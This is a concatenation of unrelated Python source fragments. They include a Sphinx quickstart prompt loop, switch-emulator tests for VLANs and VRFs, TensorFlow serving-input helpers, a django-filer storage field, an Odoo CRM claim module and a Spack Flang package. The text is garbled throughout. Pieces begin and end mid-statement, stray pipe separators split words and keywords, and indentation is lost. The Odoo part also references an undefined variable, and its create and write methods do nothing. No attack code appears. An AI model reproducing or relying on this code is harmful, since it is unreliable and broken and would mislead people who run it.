return x[0:1] == '.' and len(x) > 1
def ok(x):
return True
def do_prompt(d, key, text, default=None, validator=nonempty):
while True:
if default:
prompt = purple(PROMPT_PREFIX + '%s [%s]: ' % (text, default))
else:
prompt = purple(PROMPT_PREFIX + text + ': ')
x = raw_input(prompt)
if default and not x:
x = default
if validator and not validator(x):
print red(" * " + validator.__doc__)
continue
break
d[key] = x
def inner_main(args):
d = {}
if os.name == 'nt' or not sys.stdout.isatty():
nocolor()
print bold('Welcome to the Sphinx quickstart utility.')
print '''
Please enter values for the following settings (just press Enter to
accept a default value, if one is given in brackets).'''
print '''
Enter the root path for documentation.'''
do_prompt(d, 'path', 'Root path for the documentation', '.', is_path)
print '''
You have two options for placing the build directory for Sphinx output.
Either, you use a directory ".build" within the root path, or you separate
"source" and "build" directories within the root path.'''
do_prompt(d, 'sep', 'Separate source and build directories (y/N)', 'n',
boolean)
print '''
Inside the root directory, two more directories will be created; ".templates"
for custom HTML templates and ".static" for custom stylesheets and other
static files. Since the leading dot may be inconvenient for Windows users,
you can enter another prefix (such as "_") to replace the dot.'''
do_prompt(d, 'dot', 'Name prefix for templates and static dir', '.', ok)
print '''
The project name will occur in several places in the built documentation.'''
do_prompt(d, 'project', 'Project name')
do_prompt(d, 'author', 'Author name(s)')
print '''
Sphinx has the notion of a "version" and a "release" for the
software. Each version can have multiple releases. For example, for
Python the version is something like 2.5 or 3.0, while the release is
something like 2.5.1 or 3.0a1. If you don't need this dual structure,
just set both to the same value.'''
do_prompt(d, 'version', 'Project version')
do_prompt(d, 'release', 'Project release', d['version'])
print '''
The file name suffix for source files. Co | mmonly, this is either ".txt"
or ".rst". Only files with this suffix are considered documents.'''
do_prompt(d, 'suffix', | 'Source file suffix', '.rst', suffix)
print '''
One document is special in that it is considere |
.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.128")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" ip address | 4.2.2.2 255.255.255.0 secondary",
" ip address 3.2.2.2 255.255.255.128",
"end"])
configuring(t, do="no interface vlan 40 | 00")
@with_protocol
def test_overlapping_ips(self, t):
enable(t)
create_vlan(t, "1000")
create_interface_vlan(t, "1000")
create_vlan(t, "2000")
create_interface_vlan(t, "2000")
configuring_interface_vlan(t, "1000", do="ip address 2.2.2.2 255.255.255.0")
configuring_interface_vlan(t, "1000", do="ip address 3.3.3.3 255.255.255.0 secondary")
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan2000")
t.read("my_switch(config-if)#")
t.write("ip address 2.2.2.75 255.255.255.128")
t.readln("% 2.2.2.0 overlaps with secondary address on Vlan1000")
t.read("my_switch(config-if)#")
t.write("ip address 3.3.3.4 255.255.255.128")
t.readln("% 3.3.3.0 is assigned as a secondary address on Vlan1000")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
configuring(t, do="no interface vlan 2000")
remove_vlan(t, "2000")
configuring(t, do="no interface vlan 1000")
remove_vlan(t, "1000")
@with_protocol
def test_unknown_ip_interface(self, t):
enable(t)
t.write("show ip interface Vlan2345")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_removing_ip_needs_to_compare_objects_better(self, t):
enable(t)
create_vlan(t, "1000")
create_interface_vlan(t, "1000")
configuring_interface_vlan(t, "1000", do="ip address 1.1.1.1 255.255.255.0")
configuring_interface_vlan(t, "1000", do="ip address 1.1.1.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "1000", do="ip address 1.1.1.3 255.255.255.0 secondary")
configuring_interface_vlan(t, "1000", do="no ip address 1.1.1.3 255.255.255.0 secondary")
t.write("show ip interface vlan 1000")
t.readln("Vlan1000 is down, line protocol is down")
t.readln(" Internet address is 1.1.1.1/24")
t.readln(" Secondary address 1.1.1.2/24")
t.readln(" Outgoing access list is not set")
t.readln(" Inbound access list is not set")
t.read("my_switch#")
configuring(t, do="no interface vlan 1000")
remove_vlan(t, "1000")
@with_protocol
def test_extreme_vlan_range(self, t):
enable(t)
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("vlan -1")
t.readln("Command rejected: Bad VLAN list - character #1 ('-') delimits a VLAN number")
t.readln(" which is out of the range 1..4094.")
t.read("my_switch(config)#")
t.write("vlan 0")
t.readln("Command rejected: Bad VLAN list - character #X (EOL) delimits a VLAN")
t.readln("number which is out of the range 1..4094.")
t.read("my_switch(config)#")
t.write("vlan 1")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("vlan 4094")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("no vlan 4094")
t.read("my_switch(config)#")
t.write("vlan 4095")
t.readln("Command rejected: Bad VLAN list - character #X (EOL) delimits a VLAN")
t.readln("number which is out of the range 1..4094.")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
@with_protocol
def test_full_running_config_and_pipe_begin_support(self, t):
enable(t)
create_vlan(t, "1000", name="hello")
create_interface_vlan(t, "1000")
configuring_interface(t, "Fa0/2", do="switchport mode trunk")
configuring_interface(t, "Fa0/2", do="switchport trunk allowed vlan 125")
t.write("show running | beg vlan")
t.readln("vlan 1")
t.readln("!")
t.readln("vlan 1000")
t.readln(" name hello")
t.readln("!")
t.readln("interface FastEthernet0/1")
t.readln("!")
t.readln("interface FastEthernet0/2")
t.readln(" switchport trunk allowed vlan 125")
t.readln(" switchport mode trunk")
t.readln("!")
t.readln("interface FastEthernet0/3")
t.readln("!")
t.readln("interface FastEthernet0/4")
t.readln("!")
t.readln("interface FastEthernet0/5")
t.readln("!")
t.readln("interface FastEthernet0/6")
t.readln("!")
t.readln("interface FastEthernet0/7")
t.readln("!")
t.readln("interface FastEthernet0/8")
t.readln("!")
t.readln("interface FastEthernet0/9")
t.readln("!")
t.readln("interface FastEthernet0/10")
t.readln("!")
t.readln("interface FastEthernet0/11")
t.readln("!")
t.readln("interface FastEthernet0/12")
t.readln("!")
t.readln("interface Vlan1000")
t.readln(" no ip address")
t.readln("!")
t.readln("end")
t.readln("")
t.read("my_switch#")
configuring_interface(t, "Fa0/2", do="no switchport mode trunk")
configuring_interface(t, "Fa0/2", do="no switchport trunk allowed vlan")
configuring(t, do="no interface vlan 1000")
remove_vlan(t, "1000")
@with_protocol
def test_pipe_inc_support(self, t):
enable(t)
create_vlan(t, "1000", name="hello")
t.write("show running | inc vlan")
t.readln("vlan 1")
t.readln("vlan 1000")
t.read("my_switch#")
remove_vlan(t, "1000")
@with_protocol
def test_ip_vrf(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("ip vrf SOME-LAN")
t.read("my_switch(config-vrf)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("no ip vrf SOME-LAN")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
@with_protocol
def test_ip_vrf_forwarding(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("ip vrf SOME-LAN")
t.read("my_switch(config-vrf)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("interface Fa0/2")
t.read("my_switch(config-if)#")
t.write("ip vrf forwarding NOT-DEFAULT-LAN")
t.readln("% VRF NOT-DEFAULT-LAN not configured.")
t.read("my_switch(config-if)#")
t.write("ip vrf forwarding SOME-LAN")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
" ip vrf forwarding SOME-LAN",
"end"])
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("no ip vrf SOME-LAN")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, |
# -*- coding: utf-8 -*-
import sys
import pytest
| py3 = sys.version_info[0] >= 3
class DummyCollector(pytest.collect.File):
def collect(self):
| return []
def pytest_pycollect_makemodule(path, parent):
bn = path.basename
if "py3" in bn and not py3 or ("py2" in bn and py3):
return DummyCollector(path, parent=parent)
|
he specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configuration and utilities for receiving inputs at serving time."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import time
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.util import compat
_SINGLE_FEATURE_DEFAULT_NAME = 'feature'
_SINGLE_RECEIVER_DEFAULT_NAME = 'input'
class ServingInputReceiver(collections.namedtuple(
'ServingInputReceiver',
['features', 'receiver_tensors', 'receiver_tensors_alternatives'])):
"""A return type for a serving_input_receiver_fn.
The expected return values are:
features: A `Tensor`, `SparseTensor`, or dict of string to `Tensor` or
`SparseTensor`, specifying the features to be passed to the model.
receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
input nodes where this receiver expects to be fed by default. Typically,
this is a single placeholder expecting serialized `tf.Example` protos.
receiver_tensors_alternatives: a dict of string to additional
groups of receiver tensors, each of which may be a `Tensor` or a dict of
string to `Tensor`. These named receiver tensor alternatives generate
additional serving signatures, which may be used to feed inputs at
different points within the input reciever subgraph. A typical usage is
to allow feeding raw feature `Tensor`s *downstream* of the
tf.parse_example() op. Defaults to None.
"""
def __new__(cls, features, receiver_tensors,
receiver_tensors_alternatives=None):
if features is None:
raise ValueError('features must be defined.')
if not isinstance(features, dict):
features = {_SINGLE_FEATURE_DEFAULT_NAME: features}
for name, tensor in features.items():
if not isinstance(name, six.string_types):
raise ValueError('feature keys must be strings: {}.'.format(name))
if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor)):
raise ValueError(
'feature {} must be a Tensor or SparseTensor.'.format(name))
if receiver_tensors is None:
raise ValueError('receiver_tensors must be defined.')
if not isinstance(receiver_tensors, dict):
receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
for name, tensor in receiver_tensors.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not isinstance(tensor, ops.Tensor):
raise ValueError(
'receiver_tensor {} must be a Tensor.'.format(name))
if receiver_tensors_alternatives is not None:
if not isinstance(receiver_tensors_alternatives, dict):
raise ValueError(
'receiver_tensors_alternatives must be a dict: {}.'.format(
receiver_tensors_alternatives))
for alternative_name, receiver_tensors_alt in (
six.iteritems(receiver_tensors_alternatives)):
if not isinstance(receiver_tensors_alt, dict):
receiver_tensors_alt = {_SINGLE_RECEIVER_DEFAULT_NAME:
receiver_tensors_alt}
# Updating d | ict during iteration is OK in this case.
receiver_tensors_alternatives[alternative_name] | = (
receiver_tensors_alt)
for name, tensor in receiver_tensors_alt.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor)):
raise ValueError(
'receiver_tensor {} must be a Tensor or SparseTensor.'.format(
name))
return super(ServingInputReceiver, cls).__new__(
cls,
features=features,
receiver_tensors=receiver_tensors,
receiver_tensors_alternatives=receiver_tensors_alternatives)
def build_parsing_serving_input_receiver_fn(feature_spec,
default_batch_size=None):
"""Build a serving_input_receiver_fn expecting fed tf.Examples.
Creates a serving_input_receiver_fn that expects a serialized tf.Example fed
into a string placeholder. The function parses the tf.Example according to
the provided feature_spec, and returns all parsed Tensors as features.
Args:
feature_spec: a dict of string to `VarLenFeature`/`FixedLenFeature`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn suitable for use in serving.
"""
def serving_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = array_ops.placeholder(dtype=dtypes.string,
shape=[default_batch_size],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = parsing_ops.parse_example(serialized_tf_example, feature_spec)
return ServingInputReceiver(features, receiver_tensors)
return serving_input_receiver_fn
def build_raw_serving_input_receiver_fn(features, default_batch_size=None):
"""Build a serving_input_receiver_fn expecting feature Tensors.
Creates an serving_input_receiver_fn that expects all features to be fed
directly.
Args:
features: a dict of string to `Tensor`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn.
"""
def serving_input_receiver_fn():
"""A serving_input_receiver_fn that expects features to be fed directly."""
receiver_tensors = {}
for name, t in features.items():
shape_list = t.get_shape().as_list()
shape_list[0] = default_batch_size
shape = tensor_shape.TensorShape(shape_list)
# Reuse the feature tensor's op name (t.op.name) for the placeholder,
# excluding the index from the tensor's name (t.name):
# t.name = "%s:%d" % (t.op.name, t._value_index)
receiver_tensors[name] = array_ops.placeholder(
dtype=t.dtype, shape=shape, name=t.op.name)
# TODO(b/34885899): remove the unnecessary copy
# The features provided are simply the placeholders, but we defensively copy
# the dict because it may be mutated.
return ServingInputReceiver(receiver_tensors, receiver_tensors.copy())
return serving_input_receiver_fn
### Below utilities are specific to SavedModel exports.
def build_all_signature_defs(receiver_tensors,
export_outputs,
receiver_tensors_alternatives=None):
"""Build `SignatureDef`s for all export outputs."""
if not isinstance(receiver_tensors, dict):
receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
if export_outputs is None or not isinstance(export_outputs, dict):
raise ValueError('export_outputs must be a dict.')
signature_def_map = {}
excluded_signatures = {}
for output_key, export_output in export_outputs.items():
signature_name = '{}'.format(output_key or 'None')
try:
signature = export_output.as_signature_def(receiver_tensors)
signature_def_map[signature_name] |
__author__ = 'thor'
import ut as ms
import pandas as pd
import ut.pcoll.order_conserving
from functools import reduce
class SquareMatrix(object):
def __init__(self, df, index_vars=None, sort=False):
if isinstance(df, SquareMatrix):
self = df.copy()
elif isinstance(df, pd.DataFrame):
self.df = df
self.index_vars = index_vars
self.value_vars = ms.pcoll.order_conserving.setdiff(list(self.df.columns), self.index_vars)
self.df = self.df[self.index_vars + self.value_vars]
else:
raise NotImplementedError("This case hasn't been implemented yet")
if sort:
self.df.sort(columns=self.index_vars, inplace=True)
def copy(self):
return SquareMatrix(df=self.df.copy(), index_vars=self.index_vars)
def transpose(self):
return SquareMatrix(df=self.df, index_vars=[self.index_vars[1], self.index_vars[0]])
def reflexive_mapreduce(self, map_fun, reduce_fun=None, broadcast_functions=True):
df = self.df.merge(self.df, how='inner', left_on=self.index_vars[1],
right_on=self.index_vars[0], suffixes=('', '_y'))
df[self.index_vars[1]] = df[self.index_vars[1] + '_y']
df.drop(labels=[self.index_vars[0] + '_y', self.index_vars[1] + '_y'], axis=1, inplace=True)
if not isinstance(map_fun, dict) and broadcast_functions:
map_fun = dict(list(zip(self.value_vars, [map_fun] * len(self.value_vars))))
for k, v in map_fun.items():
df[k] = v(df[k], df[k + '_y'])
df.drop(labels=[x + '_y' for x in self.value_vars], axis=1, inplace=True)
if not reduce_fun:
reduce_fun = dict()
for k, v in map_fun.items():
| reduce_fun[k] = lambda x: reduce(v, x)
elif not isinstance(reduce_fun, dict) and broadcast_functions:
reduce_fun = dict(list(zip(self.value_vars, [reduce_fun] * len(self.value_vars))))
df = df.groupby(self.index_vars).agg(reduce_fun).reset_index(drop=False)
return SquareMatrix(df=df, index_vars=self.index_vars) |
def reverse_indices(self):
return [self.index_vars[1], self.index_vars[0]]
def sort(self, **kwargs):
kwargs = dict({'columns': self.index_vars}, **kwargs)
sm = self.copy()
sm.df = sm.df.sort(**kwargs)
return sm
def __str__(self):
return self.df.__str__()
def __repr__(self):
return self.df.set_index(self.index_vars).__str__()
def head(self, num_of_rows=5):
return self.df.head(num_of_rows)
def tail(self, num_of_rows=5):
return self.df.tail(num_of_rows) |
from datetime import date, timedelta
INITIAL_OFFSET = timedelta(days=5)
class IntervalException(Exception):
"""
Exception to be raises when interval is behaving
weirdly - as not an interval
"""
def get_dates_for_timedelta(interval_delta, start=None, stop=None,
skip_weekend=False):
"""
For given interval_delta it will return list of dates starting from
``starting date``
:param interval_del | ta: interval_delta instance
:type interval_delta: datetime.timedelta
:param start: starting point of the interval
:type start: date
:param st | op: when to stop
:param skip_weekend: don't place dates at weekends
:return: [datetime objects]
"""
if start is None:
start = date.today()
if stop is None:
stop = start + timedelta(days=365)
dates = [start]
while dates[-1] + interval_delta <= stop:
increased_date = dates[-1] + interval_delta
if skip_weekend and increased_date.isoweekday() > 5:
increased_date += timedelta(days=2)
if increased_date == dates[-1]:
raise IntervalException(interval_delta)
dates.append(increased_date)
return dates
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import base64
import hashlib
import warnings
from io import BytesIO
from django.core.files.base import ContentFile
from django.utils import six
from easy_thumbnails import fields as easy_thumbnails_fields
from easy_thumbnails import files as easy_thumbnails_files
from .. import settings as filer_settings
from ..utils.filer_easy_thumbnails import ThumbnailerNameMixin
STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_STORAGE,
}
THUMBNAIL_STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_STORAGE,
}
THUMBNAIL_OPTIONS = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_OPTIONS,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_OPTIONS,
}
def generate_filename_multistorage(instance, filename):
if instance.is_public:
upload_to = filer_settings.FILER_PUBLICMEDIA_UPLOAD_TO
else:
upload_to = filer_settings.FILER_PRIVATEMEDIA_UPLOAD_TO
if callable(upload_to):
return upload_to(instance, filename)
else:
return upload_to
class MultiStorageFieldFile(ThumbnailerNameMixin,
easy_thumbnails_files.ThumbnailerFieldFile):
def __init__(self, instance, field, name):
"""
This is a little weird, but I couldn't find a better solution.
Thumbnailer.__init__ is called first for proper object inizialization.
Then we override some attributes defined at runtime with properties.
We cannot simply call super().__init__ because filer Field objects
doesn't have a storage attribute.
"""
easy_thumbnails_files.Thumbnailer.__init__(self, None, name)
self.instance = instance
self.field = field
self._committed = True
self.storages = self.field.storages
self.thumbnail_storages = self.field.thumbnail_storages
self.thumbnail_options = self.field.thumbnail_options
self.storage = self._storage
self.source_storage = self._source_storage
self.thumbnail_storage = self._thumbnail_storage
self.thumbnail_basedir = self._thumbnail_base_dir
@property
def _storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _source_storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _thumbnail_storage(self):
if self.instance.is_public:
return self.thumbnail_storages['public']
else:
return self.thumbnail_storages['private']
@property
def _thumbnail_base_dir(self):
if self.instance.is_public:
return self.thumbnail_options['public'].get('base_dir', '')
else:
return self.thumbnail_options['private'].get('base_dir', '')
def save(self, name, content, save=True):
content.seek(0) # Ensure we upload the whole file
super(MultiStorageFieldFile, self).save(name, content, save)
class Multi | StorageFileField(easy_thumbnails_fields.ThumbnailerField):
attr_class = MultiStorageFieldFile
def __init__(self, verbose_name=None, name=None,
| storages=None, thumbnail_storages=None, thumbnail_options=None, **kwargs):
if 'upload_to' in kwargs: # pragma: no cover
upload_to = kwargs.pop("upload_to")
if upload_to != generate_filename_multistorage:
warnings.warn("MultiStorageFileField can handle only File objects;"
"%s passed" % upload_to, SyntaxWarning)
self.storages = storages or STORAGES
self.thumbnail_storages = thumbnail_storages or THUMBNAIL_STORAGES
self.thumbnail_options = thumbnail_options or THUMBNAIL_OPTIONS
super(easy_thumbnails_fields.ThumbnailerField, self).__init__(
verbose_name=verbose_name, name=name,
upload_to=generate_filename_multistorage,
storage=None, **kwargs)
def value_to_string(self, obj):
value = super(MultiStorageFileField, self).value_to_string(obj)
if not filer_settings.FILER_DUMP_PAYLOAD:
return value
try:
payload_file = BytesIO(self.storage.open(value).read())
sha = hashlib.sha1()
sha.update(payload_file.read())
if sha.hexdigest() != obj.sha1:
warnings.warn('The checksum for "%s" diverges. Check for file consistency!' % obj.original_filename)
payload_file.seek(0)
encoded_string = base64.b64encode(payload_file.read()).decode('utf-8')
return value, encoded_string
except IOError:
warnings.warn('The payload for "%s" is missing. No such file on disk: %s!' % (obj.original_filename, self.storage.location))
return value
def to_python(self, value):
if isinstance(value, list) and len(value) == 2 and isinstance(value[0], six.text_type):
filename, payload = value
try:
payload = base64.b64decode(payload)
except TypeError:
pass
else:
if self.storage.exists(filename):
self.storage.delete(filename)
self.storage.save(filename, ContentFile(payload))
return filename
return value
|
import | string
from random import choice
from django.contrib.auth.models import User
def get_random_id():
valid_id = False
test_name = 'EMPTY'
while valid_id is False:
s1 = ''.join([choice(string.ascii_uppercase) for i in range(2)])
s2 = ''.join([choice(string.digits) for i in range(8)])
test_name = u'%s%s' % (s1,s2)
try:
User.objects.get(username=test_name)
except:
valid_id = True
return test_name
| |
'user_id': fields.many2one('res.users', 'Responsible', track_visibility='always'),
'day_to_action_next': fields.integer('Days to next action'),
'action_next': fields.char('Next Action'),
'days_to_date_deadline': fields.char('Date to deadline'),
}
_defaults = {
'day_next_action': lambda self, cr, uid, context: '7',
}
crm_claim_stage()
class crm_claim_type(osv.osv):
""" Type of Claim """
_name = "crm.claim.type"
_description = "Type of Claim"
_columns = {
'name': fields.char('Name', required=True, translate=True),
'parent_id': fields.many2one('crm.claim.type', 'Type of claim', required=False, ondelete='cascade',
help="Cl | aim type."),
}
"""def _find_object_id(self, cr, uid, context=None):
context = context o | r {}
object_id = context.get('object_id', False)
ids = self.pool.get('ir.model').search(cr, uid, ['|', ('id', '=', object_id), ('model', '=', context.get('object_name', False))])
return ids and ids[0] or False
_defaults = {
'object_id': _find_object_id
}"""
class claim_from_invoice(osv.osv_memory):
_name = 'claim.from.invoice'
_description = 'claim from invoice'
_columns = {
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
}
def claim_from_invoice(self, cr, uid, ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
class view_account_invoice_claims(osv.osv):
_name = "view.account.invoice.claims"
_description = "Claim by account invoice"
_auto = False
_columns = {
'id': fields.integer('ID', readonly=True),
'invoice_id': fields.many2one('account.invoice', 'Invoice'),
'partner_id': fields.many2one('res.partner', 'Partner'),
'number': fields.char('number'),
'name': fields.char('name'),
'claim_id': fields.many2one('crm.claim', 'Claim'),
'crm_claim_name': fields.char('Subject'),
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
#'invoice_line_text_line':fields.function('get_text_lines', store=False,relation='view.account.invoice.claims' ,
# method=True, string='lines',type='char')
'invoice_line_text': fields.char(compute='_get_text_lines' ,store=False, string="Productos"),
}
@api.depends('invoice_line_text','invoice_line')
def _get_text_lines(self):
_logger.info("filoquin ----- self : %r", self)
for record in self:
record.invoice_line_text ='sada'
def prueba(self, cr, uid,ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
_logger.info("filoquin ----- context : %r", context)
def _get_default_warehouse(self, cr, uid, context=None):
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
company_id = user.company_id.id
wh_obj = self.pool.get('stock.warehouse')
wh_ids = wh_obj.search(cr, uid,
[('company_id', '=', company_id)],
context=context)
if not wh_ids:
raise orm.except_orm(
_('Error!'),
_('There is no warehouse for the current user\'s company.'))
return wh_ids[0]
def create(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- create : %r", vals)
#newclaim=self.newclaim( cr, uid, [vals['invoice_id']], context=None)
_logger.info("filoquin ----- newclaim : %r", newclaim)
pass
def write(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- write : %r", vals)
pass
def newclaim(self, cr, uid, ids, context=None):
res_invoice_id = ids[0]
claims = self.pool.get('crm.claim').search(cr,uid,
[('invoice_id', '=', res_invoice_id)],
context=context)
if claims :
return self.open_claim(cr, uid, claims[0], context=context)
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
invoice = self.pool.get('account.invoice').browse(cr, uid, res_invoice_id, context=context)
new_claim={'invoice_id': res_invoice_id,
'number_id' : '/',
'partner_id': invoice.partner_id.id,
'email_from': invoice.partner_id.email,
'partner_phone': invoice.partner_id.phone,
'claim_type': 'customer',
'company_id': user.company_id.id,
'name': 'prueba ' }
claim_line_ids=self.add_lines(cr, uid,res_invoice_id, new_claim['claim_type'],datetime.now,
new_claim['company_id'],context=context)
new_claim['claim_line_ids']=[(6,0,claim_line_ids)]
return_id = self.pool.get('crm.claim').create(cr,uid,new_claim)
return self.open_claim(cr, uid, return_id, context=context)
def add_lines(self,cr, uid, invoice_id, claim_type, claim_date, company_id, context=None):
invoice_line_obj = self.pool.get('account.invoice.line')
invoice_obj = self.pool.get('account.invoice')
product_obj = self.pool['product.product']
claim_line_obj = self.pool.get('claim.line')
company_obj = self.pool['res.company']
warehouse_obj = self.pool['stock.warehouse']
invoice_line_ids = invoice_line_obj.search(
cr, uid,
[('invoice_id', '=', invoice_id)],
context=context)
claim_lines = []
value = {}
warehouse_id = self._get_default_warehouse(cr, uid,
context=context)
invoice_lines = invoice_line_obj.browse(cr, uid, invoice_line_ids,
context=context)
def warranty_values(invoice, product):
values = {}
try:
warranty = claim_line_obj._warranty_limit_values(
cr, uid, [], invoice,
claim_type, product,
claim_date, context=context)
except (InvoiceNoDate, ProductNoSupplier):
# we don't mind at this point if the warranty can't be
# computed and we don't want to block the user
values.update({'guarantee_limit': False, 'warning': False})
else:
values.update(warranty)
company = company_obj.browse(cr, uid, company_id, context=context)
warehouse = warehouse_obj.browse(cr, uid, warehouse_id,
context=context)
warranty_address = claim_line_obj._warranty_return_address_values(
cr, uid, [], product, company,
warehouse, context=context)
values.update(warranty_address)
return values
for invoice_line in invoice_lines:
location_dest_id = claim_line_obj.get_destination_location(
cr, uid, invoice_line.product_id.id,
warehouse_id, context=context)
line = {
'name': invoice_line.name,
'claim_origine': "none",
'invoice_line_id': invoice_line.id,
'product_id': invoice_line.product_id.id,
'product_returned_quantity': invoice_line.quantity,
'unit_sale_price': invoice_line.price_unit,
'location_dest_id': location_dest_id,
'state': 'draft',
}
line.update(warranty_values(invoice_line.invoice_id,invoice_line.product_id))
line_id=self.pool.get('claim.line').create(cr, uid,line)
claim_lines.append(line_id)
return claim_lines;
def open_claim(self, cr, uid, claim_id, context=None):
ir_model_data = self.pool.get('ir.model.data')
form_res = ir_model_data.get_object_reference(cr, uid, 'crm_claim', 'crm_case |
##############################################################################
# Copyright (c) 2017, Los Alamos National Security, LLC
# Produced at the Los Alamos National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import os
class Flang(CMakePackage):
"""Flang is a Fortran compiler targeting LLVM."""
homepage = "https://github.com/flang-compiler/flang"
url = "https://github.com/flang-compiler/flang/archive/flang_20180612.tar.gz"
git = "https://github.com/flang-compiler/flang.git"
version('develop', branch='master')
version('20180612', '62284e26214eaaff261a922c67f6878c')
depends_on('llvm@flang-develop', when='@develop')
depends_on('llvm@flang-20180612', when='@20180612 target=x86_64')
# LLVM version specific to OpenPOWER.
depends_on('llvm@flang-ppc64le-20180612', when='@20180612 target=ppc64le')
depends_on('pgmath@develop', when='@develop')
depends_on('pgmath@20180612', when='@20180612')
def cmake_args(self):
options = [
'-DWITH_WERROR=OFF',
'-DCMAKE_C_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'clang'),
'-DCMAKE_CXX_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'clang++'),
'-DCMAKE_Fortran_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'flang'),
'-DFLANG_LIBOMP=%s' % find_libraries(
'libomp', root=self.spec['llvm'].prefix.lib)
]
return options
@run_after('install')
def post_install(self):
# we are installing flang in a path different from llvm, so we
# create a wrapper with -L for e.g. libflangrti.so and -I for
# e.g. iso_c_binding.mod. -B is needed to help flang to find
# flang1 and flang2. rpath_arg is needed so that executables
# generated by flang can find libflang later.
flang = os.path.join(self.spec.prefix.bin, 'flang')
with open(flang, 'w') as out:
out.write('#!/bin/bash\n')
out.write(
'{0} -I{1} -L{2} -L{3} {4}{5} {6}{7} -B{8} "$@"\n'.format(
self.spec['llvm'].prefix.bin.flang,
self.prefix.include, self.prefix.lib,
self.spec['pgmath'].prefix.lib,
